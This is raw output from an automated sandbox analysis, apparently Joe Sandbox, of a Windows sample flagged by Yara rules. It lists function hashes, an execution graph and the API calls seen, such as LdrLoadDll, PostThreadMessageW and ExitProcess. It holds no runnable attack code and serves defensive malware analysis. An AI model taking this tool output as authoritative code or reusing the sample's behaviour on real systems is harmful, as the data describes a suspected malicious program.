                                                                              Function 06BA73D0 Relevance: .3, Instructions: 312COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 57cbf8f8220b814847f40a38ffb3549858f18740893286628066821dcfd08507
                                                                              • Instruction ID: d28c355ceeb0044d6717a3a5ec30e3ea43c7de41690079346a6ee2b8668c534e
                                                                              • Opcode Fuzzy Hash: 57cbf8f8220b814847f40a38ffb3549858f18740893286628066821dcfd08507
                                                                              • Instruction Fuzzy Hash: 68E1FBB4E142198FDB54DFA9C580AAEFBF2FF89304F2481A9D414AB355DB30A941CF61
                                                                              Function 0266D51C Relevance: .3, Instructions: 264COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1303631640.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_2660000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 652e12b3f891877ae9b030914330c76340e0a2b275c79dfe07fd5e370c099fd8
                                                                              • Instruction ID: 3d5a55c2f8a95aed5db754a83f0f7f1b31c77b9969d72dd28da2b6f1349a3c09
                                                                              • Opcode Fuzzy Hash: 652e12b3f891877ae9b030914330c76340e0a2b275c79dfe07fd5e370c099fd8
                                                                              • Instruction Fuzzy Hash: FCA18032E002098FCF15DFB5E8445AEBBB2FF85304F15856AE806AB265DB71E956CF40

                                                                              Execution Graph

                                                                              Execution Coverage:1.3%
                                                                              Dynamic/Decrypted Code Coverage:4.5%
                                                                              Signature Coverage:8.4%
                                                                              Total number of Nodes:155
                                                                              Total number of Limit Nodes:15
                                                                              execution_graph 89910 424bc3 89911 424bdf 89910->89911 89912 424c07 89911->89912 89913 424c1b 89911->89913 89914 42c8d3 NtClose 89912->89914 89920 42c8d3 89913->89920 89916 424c10 89914->89916 89917 424c24 89923 42ea93 RtlAllocateHeap 89917->89923 89919 424c2f 89921 42c8f0 89920->89921 89922 42c901 NtClose 89921->89922 89922->89917 89923->89919 89928 424f53 89929 424f6c 89928->89929 89930 424fb7 89929->89930 89933 424ffa 89929->89933 89935 424fff 89929->89935 89936 42e973 89930->89936 89934 42e973 RtlFreeHeap 89933->89934 89934->89935 89939 42cc43 89936->89939 89938 424fc7 89940 42cc60 89939->89940 89941 42cc71 RtlFreeHeap 89940->89941 89941->89938 89942 42fa13 89943 42fa23 89942->89943 89944 42fa29 89942->89944 89947 42ea53 89944->89947 89946 42fa4f 89950 42cbf3 89947->89950 89949 42ea6e 89949->89946 89951 42cc10 89950->89951 89952 42cc21 RtlAllocateHeap 89951->89952 89952->89949 89953 42bed3 89954 42bef0 89953->89954 89957 17e2df0 LdrInitializeThunk 89954->89957 89955 42bf18 89957->89955 89958 413d73 89959 413d95 89958->89959 89961 42cb63 89958->89961 89962 42cb80 89961->89962 89965 17e2c70 LdrInitializeThunk 89962->89965 89963 42cba8 89963->89959 89965->89963 89966 41a833 89967 41a84b 89966->89967 89969 41a8a5 89966->89969 89967->89969 89970 41e753 89967->89970 89971 41e779 89970->89971 89977 41e879 89971->89977 89979 42fb43 89971->89979 89973 41e80e 89974 41e870 89973->89974 89973->89977 89990 42bf23 89973->89990 89974->89977 89985 428b53 89974->89985 89977->89969 89978 41e931 89978->89969 89980 42fab3 89979->89980 89981 42fb10 89980->89981 89982 42ea53 RtlAllocateHeap 89980->89982 89981->89973 89983 42faed 89982->89983 89984 42e973 RtlFreeHeap 89983->89984 89984->89981 89986 428bb8 89985->89986 89987 428bf3 89986->89987 89994 418e23 89986->89994 89987->89978 89989 428bd5 89989->89978 89991 42bf40 89990->89991 90001 17e2c0a 89991->90001 89992 42bf6c 89992->89974 89995 418dbf 89994->89995 89997 418e0b 89994->89997 89998 42cc93 89995->89998 89997->89989 89999 42ccb0 89998->89999 90000 42ccc1 ExitProcess 89999->90000 90000->89997 90002 17e2c1f LdrInitializeThunk 90001->90002 90003 17e2c11 90001->90003 90002->89992 90003->89992 90004 4142d3 90005 4142ec 90004->90005 90010 417a73 90005->90010 90007 41430a 90008 414356 90007->90008 90009 414343 PostThreadMessageW 90007->90009 90009->90008 90012 417a97 90010->90012 90011 417a9e 90011->90007 90012->90011 90014 417abd 90012->90014 90017 42fdf3 LdrLoadDll 90012->90017 90015 417ad3 LdrLoadDll 90014->90015 90016 417aea 90014->90016 90015->90016 90016->90007 90017->90014 90018 41b593 90019 41b5d7 90018->90019 90020 41b5f8 90019->90020 90021 42c8d3 NtClose 90019->90021 90021->90020 90022 414416 90023 414419 90022->90023 90024 4143af 90022->90024 90025 414342 PostThreadMessageW 90024->90025 90026 414356 90024->90026 90025->90026 89924 418f48 89925 418f49 89924->89925 89926 42c8d3 NtClose 89925->89926 89927 418f01 89925->89927 89926->89927 90027 4019dc 90028 4019f1 90027->90028 90028->90028 90031 42fee3 90028->90031 90034 42e523 90031->90034 90035 42e549 90034->90035 90046 407273 90035->90046 90037 42e55f 90045 401afd 90037->90045 90049 41b3a3 90037->90049 90039 42e57e 90040 42e593 90039->90040 90041 42cc93 ExitProcess 90039->90041 90060 428463 90040->90060 90041->90040 90043 42e5ad 90044 42cc93 ExitProcess 90043->90044 90044->90045 90064 416723 90046->90064 90048 407280 90048->90037 90050 41b3cf 90049->90050 90075 41b293 90050->90075 90053 41b414 90056 41b430 90053->90056 90058 42c8d3 NtClose 90053->90058 90054 41b3fc 90055 41b407 90054->90055 90057 42c8d3 NtClose 90054->90057 90055->90039 90056->90039 90057->90055 90059 41b426 90058->90059 90059->90039 90061 4284c5 90060->90061 90062 4284d2 90061->90062 90086 4188e3 90061->90086 90062->90043 90065 41673d 90064->90065 90067 416756 90065->90067 90068 42d313 90065->90068 90067->90048 90070 42d32d 90068->90070 90069 42d35c 90069->90067 90070->90069 90071 42bf23 LdrInitializeThunk 90070->90071 90072 42d3b9 90071->90072 90073 42e973 RtlFreeHeap 90072->90073 90074 42d3d2 90073->90074 90074->90067 90076 41b2ad 90075->90076 90080 41b389 90075->90080 90081 42bfc3 90076->90081 90079 42c8d3 NtClose 90079->90080 90080->90053 90080->90054 90082 42bfdd 90081->90082 90085 17e35c0 LdrInitializeThunk 90082->90085 90083 41b37d 90083->90079 90085->90083 90088 41890d 90086->90088 90087 418e0b 90087->90062 90088->90087 90094 413f53 90088->90094 90090 418a34 90090->90087 90091 42e973 RtlFreeHeap 90090->90091 90092 418a4c 90091->90092 90092->90087 90093 42cc93 ExitProcess 90092->90093 90093->90087 90098 413f73 90094->90098 90096 413fd2 90096->90090 90097 413fdc 90097->90090 90098->90097 90099 41b6b3 RtlFreeHeap LdrInitializeThunk 90098->90099 90099->90096 90100 17e2b60 LdrInitializeThunk

                                                                              Executed Functions

                                                                              Function 00417A73 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 222 417a73-417a8f 223 417a97-417a9c 222->223 224 417a92 call 42f553 222->224 225 417aa2-417ab0 call 42fb53 223->225 226 417a9e-417aa1 223->226 224->223 229 417ac0-417ad1 call 42dff3 225->229 230 417ab2-417abd call 42fdf3 225->230 236 417ad3-417ae7 LdrLoadDll 229->236 237 417aea-417aed 229->237 230->229 236->237
                                                                              APIs
                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AE5
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501034041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_file.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Load
                                                                              • String ID:
                                                                              • API String ID: 2234796835-0
                                                                              • Opcode ID: f7aca7ff22897dbe4d74d0a4087b515c599850f7e07237e5203b5d3da9a5bb0d
                                                                              • Instruction ID: 3da9ad656e2a33d7f058596d6c0db2f8ecc23348adbfd370e033ddd8e755fe76
                                                                              • Opcode Fuzzy Hash: f7aca7ff22897dbe4d74d0a4087b515c599850f7e07237e5203b5d3da9a5bb0d
                                                                              • Instruction Fuzzy Hash: EC0152B1E0010DBBDF10DAA5DC42FDEB778AF54308F4481A6E90897240F674EB588755
                                                                              Function 0042C8D3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 248 42c8d3-42c90f call 404663 call 42db03 NtClose
                                                                              APIs
                                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C90A
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501034041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_file.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID:
                                                                              • API String ID: 3535843008-0
                                                                              • Opcode ID: 865acb2d5640172cea7701e8b8a714ff6b9d74cb1f623fdfa03c7267b3d5827b
                                                                              • Instruction ID: edcd4929374db9964348cfcf96216c1e7e48739ffbccb93e989d5216367ee6f6
                                                                              • Opcode Fuzzy Hash: 865acb2d5640172cea7701e8b8a714ff6b9d74cb1f623fdfa03c7267b3d5827b
                                                                              • Instruction Fuzzy Hash: CCE04F752042147BC220EA6ADC41FAB775CDFC6714F108419FA4977241C7757910C7F4
                                                                              Function 017E2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 262 17e2b60-17e2b6c LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: a6349aaea2dee3298ecdb4214be2ea146f032dd24080b735fef10770f5b6d98e
                                                                              • Instruction ID: 3d4a8ec41e7c5125418a31caa15521e9e0c31aded5a697a1c1e22df6d38b6ba9
                                                                              • Opcode Fuzzy Hash: a6349aaea2dee3298ecdb4214be2ea146f032dd24080b735fef10770f5b6d98e
                                                                              • Instruction Fuzzy Hash: FB90026120640003460572584414617800AD7E1201B55C035E20145B0DC625CAA56226
                                                                              Function 017E2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: c251702a7e8b9881835ee4f742cd28888b7120ca8ad03a637a1f93a5fbd86917
                                                                              • Instruction ID: 74b6f3b3a86666f00cb9df0ec6169908ad52cb82c7ebdb690ff3d7a16a4c64a5
                                                                              • Opcode Fuzzy Hash: c251702a7e8b9881835ee4f742cd28888b7120ca8ad03a637a1f93a5fbd86917
                                                                              • Instruction Fuzzy Hash: BF90023120540413D611725845047074009D7D1241F95C426A1424578DD756CB66A222
                                                                              Function 017E2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 263 17e2c70-17e2c7c LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 24fba69a6f457864d0088b9cc6bfa478ba7cfd189b10b3c6b498bcf452dad7dd
                                                                              • Instruction ID: fc259d6c8cc1d04e0931c072ce0dc2f31e2177feab8edfe8dd191d80ce4db542
                                                                              • Opcode Fuzzy Hash: 24fba69a6f457864d0088b9cc6bfa478ba7cfd189b10b3c6b498bcf452dad7dd
                                                                              • Instruction Fuzzy Hash: 0690023120548802D6107258840474B4005D7D1301F59C425A5424678DC795CAA57222
                                                                              Function 017E35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 3611bf545818435cd5ae7afadf8eb13cd94a957b45ee17a2d5bd64f7f6ea82f8
                                                                              • Instruction ID: bc5051d7db882bb6646cb09198d71de92c57379df9630b1fc0031d5be351dbe0
                                                                              • Opcode Fuzzy Hash: 3611bf545818435cd5ae7afadf8eb13cd94a957b45ee17a2d5bd64f7f6ea82f8
                                                                              • Instruction Fuzzy Hash: 9290023160950402D600725845147075005D7D1201F65C425A1424578DC795CB6566A3
                                                                              Function 0041422D Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 62COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 41422d-414237 1 414271-414274 0->1 2 414239-414240 0->2 3 414242-41424c 2->3 4 414289-41429e 2->4 3->1 5 4142a0-4142b8 4->5 6 41431f-414341 4->6 5->6 7 414363-414368 6->7 8 414343-414354 PostThreadMessageW 6->8 8->7 9 414356-414360 8->9 9->7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501034041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_file.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: +Yf$7046-nn1K$7046-nn1K
                                                                              • API String ID: 0-152878582
                                                                              • Opcode ID: 8835f3a4d3a980d73cac9d5451b61f837560031cbaac1f6e90a95f3aac6059d8
                                                                              • Instruction ID: c275fd484e462aee15a3afa9325c1543472fcda4a2c72e174b33f2e44c37e21e
                                                                              • Opcode Fuzzy Hash: 8835f3a4d3a980d73cac9d5451b61f837560031cbaac1f6e90a95f3aac6059d8
                                                                              • Instruction Fuzzy Hash: 1B118C71B853576ACB02CEA08C81BDDB7649F92B00F0486EBE9449F6C1D3B58D878795
                                                                              Function 004142D3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • PostThreadMessageW.USER32(7046-nn1K,00000111,00000000,00000000), ref: 00414350
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501034041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_file.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostThread
                                                                              • String ID: 7046-nn1K$7046-nn1K
                                                                              • API String ID: 1836367815-59622768
                                                                              • Opcode ID: 08cef4079501bae7446cdd3a4563593f3a3346a9b3449423cb903043dd6c050e
                                                                              • Instruction ID: 516b92e160089bb7b3fe599ab1603a73bfc270ec1e4e33151ab2bbf8a00857f9
                                                                              • Opcode Fuzzy Hash: 08cef4079501bae7446cdd3a4563593f3a3346a9b3449423cb903043dd6c050e
                                                                              • Instruction Fuzzy Hash: FA010831E4021876DB20AB919C02FDF7B7C9F80B04F008016FB147B2C0D6BC570687A9
                                                                              Function 00414416 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 28 414416-414417 29 414419-414428 28->29 30 4143af 28->30 31 4143b1 30->31 32 414365-414368 30->32 33 4143b3-4143c0 31->33 34 414342-414354 PostThreadMessageW 31->34 36 4143c3-4143c6 33->36 37 414363-414364 34->37 38 414356-414360 34->38 39 4143e6-4143ea 36->39 40 4143c8-4143cc 36->40 37->32 38->37 39->36 42 4143ec-4143f0 39->42 40->39 41 4143ce-4143d2 40->41 41->39 43 4143d4-4143d8 41->43 43->39 44 4143da-4143de 43->44 44->39 45 4143e0-4143e4 44->45 45->39 46 4143f1-414401 45->46
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501034041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_file.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 7046-nn1K$7046-nn1K
                                                                              • API String ID: 0-59622768
                                                                              • Opcode ID: a47dd1c92f441ef4c73ff5499db73bb119073945b9849f7dce625e1cc4a0970a
                                                                              • Instruction ID: c4b73eb21b230dc31030ab9c1f53721eb1c4f484e884d00b70ebd9f1df3f4591
                                                                              • Opcode Fuzzy Hash: a47dd1c92f441ef4c73ff5499db73bb119073945b9849f7dce625e1cc4a0970a
                                                                              • Instruction Fuzzy Hash: 9701267578E28C2DFF31DA6068C1EE27F089782708F0881DFDD689F283D94A59865355
                                                                              Function 00417AF3 Relevance: 1.6, APIs: 1, Instructions: 62libraryloaderCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 212 417af3-417b2b 214 417b2c-417b37 212->214 214->214 215 417b39-417b40 214->215 216 417b42 215->216 217 417ac4-417ad1 call 42dff3 215->217 220 417ad3-417ae7 LdrLoadDll 217->220 221 417aea-417aed 217->221 220->221
                                                                              APIs
                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AE5
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501034041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_file.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Load
                                                                              • String ID:
                                                                              • API String ID: 2234796835-0
                                                                              • Opcode ID: 8d41206cb82bf2de7a09805619e6fe61e886688f6cc38260023a6cbf9ed9e3a9
                                                                              • Instruction ID: 974bac3e534c670f7ac2524caa8da76db0f880a9a0dc8598db73eafaeed0b4e5
                                                                              • Opcode Fuzzy Hash: 8d41206cb82bf2de7a09805619e6fe61e886688f6cc38260023a6cbf9ed9e3a9
                                                                              • Instruction Fuzzy Hash: 5A019C36A0810C7FCF10DAA4DC429EE7B78DF41285F040659D685E7201E632B64F8789
                                                                              Function 0042CBF3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 238 42cbf3-42cc37 call 404663 call 42db03 RtlAllocateHeap
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(?,0041E80E,?,?,00000000,?,0041E80E,?,?,?), ref: 0042CC32
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501034041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_file.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: 9a88fbf9543032f2133e8a9cac2bb7711bd7b960dc0391e09488a6e464b12435
                                                                              • Instruction ID: 2846fa4b3233f60a92fef8d27f7aa413956122f50d55b758d752c0d3958e743e
                                                                              • Opcode Fuzzy Hash: 9a88fbf9543032f2133e8a9cac2bb7711bd7b960dc0391e09488a6e464b12435
                                                                              • Instruction Fuzzy Hash: 28E06DB12082097BCA10EE59DC41FAB37ACEFC5714F004419FA08A7241DB74B91087B8
                                                                              Function 0042CC43 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 243 42cc43-42cc87 call 404663 call 42db03 RtlFreeHeap
                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,33F84D8B,00000007,00000000,00000004,00000000,004172DE,000000F4), ref: 0042CC82
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501034041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_file.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeHeap
                                                                              • String ID:
                                                                              • API String ID: 3298025750-0
                                                                              • Opcode ID: f35c0bb0e5c2be9d201f2d5a3767015d53e8d38ac539a827b4e54993e6d9bddc
                                                                              • Instruction ID: cc980803f6f00e9c11348fd80cdf1fb29ca32894386c6b15e328b1e50aae6e2f
                                                                              • Opcode Fuzzy Hash: f35c0bb0e5c2be9d201f2d5a3767015d53e8d38ac539a827b4e54993e6d9bddc
                                                                              • Instruction Fuzzy Hash: 80E092B12142087BD610EF59DC41FDB3BACEFC5710F004419FA08A7241D775B9108BB8
                                                                              Function 0042CC93 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 253 42cc93-42cccf call 404663 call 42db03 ExitProcess
                                                                              APIs
                                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,6995A257,?,?,6995A257), ref: 0042CCCA
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501034041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_file.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExitProcess
                                                                              • String ID:
                                                                              • API String ID: 621844428-0
                                                                              • Opcode ID: 67cb749b5959da813ff9cc8226a13492c2e86e24a442318dac2c5c70b4266204
                                                                              • Instruction ID: ac3c5cb8458b9ec8aaad2dc6460039598258f1f05cf85b266bad946a97558dfc
                                                                              • Opcode Fuzzy Hash: 67cb749b5959da813ff9cc8226a13492c2e86e24a442318dac2c5c70b4266204
                                                                              • Instruction Fuzzy Hash: 38E086356002147BD110EB6ADC41FD7776CDFC6710F004519FA48A7242C675790187F5
                                                                              Function 017E2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 258 17e2c0a-17e2c0f 259 17e2c1f-17e2c26 LdrInitializeThunk 258->259 260 17e2c11-17e2c18 258->260
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 1fdcfefc7d0969e85db29157ef8824090cb33c9324354dd062cd74acd2e58627
                                                                              • Instruction ID: e459c39f64e16b2b85943c9682b89611a3127dd16eed8a43c9003c9788d0d412
                                                                              • Opcode Fuzzy Hash: 1fdcfefc7d0969e85db29157ef8824090cb33c9324354dd062cd74acd2e58627
                                                                              • Instruction Fuzzy Hash: B2B09B719055C5C5DF11E764460C717B954B7D5701F15C075D3030652F4738C1E5E276

                                                                              Non-executed Functions

                                                                              Function 01822349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-2160512332
                                                                              • Opcode ID: 3370b0c79cc6af109aebda36bf76147de2f193e5f961144e6cfe0a32d319c95e
                                                                              • Instruction ID: 8af1926595144e664719099c543d6239645a31c6f83af2fda7198fb7c8928c53
                                                                              • Opcode Fuzzy Hash: 3370b0c79cc6af109aebda36bf76147de2f193e5f961144e6cfe0a32d319c95e
                                                                              • Instruction Fuzzy Hash: 5B92E371604352AFE722CF28C884F6BB7E9BB88714F04492DFA94D7251D770EA84CB52
                                                                              Function 017D8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • 8, xrefs: 018152E3
                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0181540A, 01815496, 01815519
                                                                              • Critical section address, xrefs: 01815425, 018154BC, 01815534
                                                                              • Thread identifier, xrefs: 0181553A
                                                                              • Critical section address., xrefs: 01815502
                                                                              • Address of the debug info found in the active list., xrefs: 018154AE, 018154FA
                                                                              • Critical section debug info address, xrefs: 0181541F, 0181552E
                                                                              • corrupted critical section, xrefs: 018154C2
                                                                              • Invalid debug info address of this critical section, xrefs: 018154B6
                                                                              • undeleted critical section in freed memory, xrefs: 0181542B
                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 01815543
                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018154E2
                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018154CE
                                                                              • double initialized or corrupted critical section, xrefs: 01815508
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                              • API String ID: 0-2368682639
                                                                              • Opcode ID: a64d938aae27370ced7129eb08e7b3357543e7c48eb416baa0db35d11cd753cd
                                                                              • Instruction ID: db0cd0de0ea2dabeb252157a6494e28ae737315525ad82744414c8c8d37dbc90
                                                                              • Opcode Fuzzy Hash: a64d938aae27370ced7129eb08e7b3357543e7c48eb416baa0db35d11cd753cd
                                                                              • Instruction Fuzzy Hash: 8581ADB2A80348EFDB20CF99C854BAEFBB9BB49714F544119F504F7685D371AA40CB91
                                                                              Function 017D29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 0181261F
                                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018122E4
                                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01812602
                                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018124C0
                                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01812498
